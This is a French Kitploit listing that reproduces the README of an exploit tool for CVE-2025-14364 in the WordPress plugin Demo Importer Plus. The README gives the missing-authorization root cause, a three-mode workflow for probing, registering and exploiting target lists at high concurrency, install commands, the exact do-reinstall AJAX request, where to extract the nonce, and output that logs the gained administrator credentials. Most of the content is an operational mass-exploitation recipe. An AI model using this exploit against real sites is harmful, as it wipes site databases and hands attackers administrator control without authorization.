Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-14364 — Demo Importer Plus <= 2.0.8 - Absence d'autorisation pour les utilisateurs authentifiés (niveau Abonné+) permettant la réinitialisation du site et l'escalade de privilèges | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-14364
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-14364

CVE-2025-14364

Demo Importer Plus <= 2.0.8 - Absence d'autorisation pour les utilisateurs authentifiés (niveau Abonné+) permettant la réinitialisation du site et l'escalade de privilèges

Voir le dépôt
1il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-14364

Demo Importer Plus <= 2.0.8 - Absence d'autorisation menant à une réinitialisation complète du site et à une escalade de privilèges (Abonné+)

CVE-2025-14364 — Demo Importer Plus · Réinitialisation complète du site → Escalade de privilèges

root@kitploit:~
  _      _   _   _  _   _            _   _
 / \  / |_ __ ) / \  ) |_ __ /| |_|_ _) |_ |_|_
 \_ \/  |_   /_ \_/ /_  _)    |   |  _) |_)  |

Abonné authentifié → Administrateur via l'action AJAX do-reinstall


CVE CVSS Plugin Auth Python Platform Author


〔 1 〕 Vulnérabilité

Cause racine :
Ajax::handle_request() enregistre l'action AJAX demo_importer_plus sans appeler current_user_can(). Tout abonné authentifié peut envoyer {"demo_action":"do-reinstall"} pour déclencher wp_install(), qui supprime toutes les tables de la base de données (sauf users / usermeta) et relance la configuration de WordPress — attribuant automatiquement le rôle Administrateur au compte attaquant dans le processus.


〔 2 〕 Déroulement de l'attaque

root@kitploit:~
Mode 1 — Diagnostic
  Sondage : DNS · /wp-login.php · /wp-admin/admin-ajax.php · REST /wp/v2/users
  → Identifier les sites WordPress actifs

Mode 2 — Inscription
  POST /wp-login.php?action=register
  → Créer un compte abonné
  → Email d'activation envoyé dans la boîte de réception
     ↳ Vous DEVEZ cliquer sur le lien de l'email avant d'exécuter le Mode 3

Mode 3 — Exploitation
  POST /wp-login.php                         → Authentification en tant qu'abonné
  GET  /wp-admin/                            → Extraire le wp-rest-nonce
  POST /wp-admin/admin-ajax.php
       action=demo_importer_plus
       {"demo_action":"do-reinstall"}        → Déclencher la réinitialisation complète du site
  ← Réponse : "Site has been reset successfully"
  → Le compte attaquant détient désormais le rôle Administrateur

〔 3 〕 Installation

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-14364.git
cd CVE-2025-14364
pip install -r requirements.txt
python3 CVE-2025-14364.py

requirements.txt

root@kitploit:~
aiohttp>=3.9.0
colorama>=0.4.6
urllib3>=1.26.0

〔 4 〕 Utilisation

root@kitploit:~
Mode [1/2/3] :           1 = Diagnostic   2 = Inscription   3 = Exploitation
Fichier cibles :         list.txt  (une cible par ligne)
Concurrence :            par défaut 30, max 200
Délai d'attente :        par défaut 10s

Format des cibles — list.txt :

root@kitploit:~
https://cible1.com
cible2.com
http://cible3.com

► Mode 1 · Diagnostic

Sonde quatre points de terminaison par cible et écrit les résultats propres.

root@kitploit:~
Mode: 1

Sortie → diagnostics_results.txt · passed_targets.txt


► Mode 2 · Inscription

root@kitploit:~
Mode: 2
Email :    [email protected]
Nom d'utilisateur : Nxploited
Mot de passe : NxploitedSA

Vérifiez votre boîte de réception et cliquez sur le lien d'activation avant d'exécuter le Mode 3.

Sortie → register_results.txt


► Mode 3 · Exploitation

root@kitploit:~
Mode: 3
Nom d'utilisateur : Nxploited
Mot de passe : NxploitedSA

En cas de succès, l'outil affiche :

root@kitploit:~
[HH:MM:SS] SUCCÈS  "success":true,"message":"Site has been reset successfully" -> https://cible.com

Et écrit dans exploit_results.txt :

root@kitploit:~
https://cible.com/wp-login.php  site:...  user:Nxploited  pass:NxploitedSA  type:admin

〔 5 〕 Fichiers de sortie


〔 6 〕 Détails techniques

Requête vulnérable :

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=demo_importer_plus HTTP/1.1
Content-Type: application/json
X-WP-Nonce: <nonce_extrait>

{"demo_action":"do-reinstall"}

Réponse réussie :

root@kitploit:~
{"success": true, "data": {"message": "Site has been reset successfully"}}

Extraction du nonce — deux sources de repli :

root@kitploit:~
wpApiSettings.nonce              (depuis le code source de la page /wp-admin/)
elementorOneSettingsData.wpRestNonce   (repli)

〔 7 〕 Auteur et contact

root@kitploit:~
Par   : Nxploited (Khaled Alenazi)
GitHub   : https://github.com/Nxploited
Telegram : @KNxploited

GitHub Telegram


〔 8 〕 Avertissement

root@kitploit:~
CE LOGICIEL EST PUBLIÉ STRICTEMENT À DES FINS DE RECHERCHE EN SÉCURITÉ ET D'ÉDUCATION.

L'auteur décline toute responsabilité quant aux actions entreprises avec cet outil
contre des systèmes que l'opérateur ne possède pas ou pour lesquels il n'a pas
d'autorisation écrite explicite de test.

Toute utilisation non autorisée contre des systèmes tiers viole les lois sur les
délits informatiques dans la plupart des juridictions (CFAA, CMA et équivalents
dans le monde entier) et peut entraîner des poursuites pénales.

Vous êtes seul responsable de vous assurer que vous disposez d'une autorisation
légale avant d'exécuter cet outil contre une cible quelconque.

© 2025 Nxploited · Recherche en sécurité uniquement · Demo Importer Plus ≤ 2.0.8 · Corrigé dans la version 2.0.9
Télécharger l’outil
CVECVE-2025-14364
CVSS v3.18.8 ÉLEVÉ — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
PluginDemo Importer Plus
Versions affectéesToutes les versions ≤ 2.0.8
Authentification requiseAbonné (rôle enregistré le plus bas)
TypeAbsence de vérification de capacité → Réinitialisation complète du site → Escalade de privilèges
CWECWE-862 · Absence d'autorisation
FichierContenu
diagnostics_results.txtJSON complet du sondage par cible
passed_targets.txtCibles propres (aucune erreur détectée)
register_results.txtEnregistrements des tentatives d'inscription
exploit_results.txtConnexion · nonce · résultats de réinitialisation · hits administrateur confirmés
reset_results.txtRéponse brute do-reinstall par cible